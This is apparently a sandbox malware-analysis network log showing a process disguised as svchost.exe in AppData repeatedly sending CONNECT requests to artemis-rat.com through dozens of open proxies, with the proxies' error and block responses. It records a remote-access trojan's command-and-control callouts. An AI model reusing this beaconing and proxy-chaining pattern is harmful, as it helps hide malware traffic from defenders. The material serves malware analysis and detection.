                                                                                    Mar 9, 2024 13:14:34.146285057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.646675110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2454192.168.2.558137185.238.228.678043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.399668932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.554184914 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2455192.168.2.55806538.54.95.19806043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.399698019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.942711115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.646262884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.146240950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.833692074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.646239042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2456192.168.2.55794751.210.223.9300043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.399945021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2457192.168.2.558146104.23.128.1748043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.400064945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.554299116 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2458192.168.2.55797646.17.63.1661000043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.400518894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.695559978 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2459192.168.2.557921123.126.158.508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.400559902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2460192.168.2.558154104.20.178.1668043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.400639057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.555161953 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2461192.168.2.55792947.93.121.2008043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.400639057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.731861115 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                    Mar 9, 2024 13:14:30.734910965 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2462192.168.2.558012184.185.2.12414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.400687933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2463192.168.2.558161203.24.108.1948043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.400719881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.555301905 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2464192.168.2.558163104.17.166.2108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.400777102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.555453062 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2465192.168.2.55799693.190.141.1024785143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.401704073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.694600105 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2466192.168.2.55798513.38.176.104312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.401724100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.698390007 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2467192.168.2.55798160.246.122.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.403413057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2468192.168.2.558179104.16.105.1428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.403413057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.558563948 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2469192.168.2.557937148.66.130.535635043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.403589010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2470192.168.2.558192172.67.181.1298043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.403597116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.558613062 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
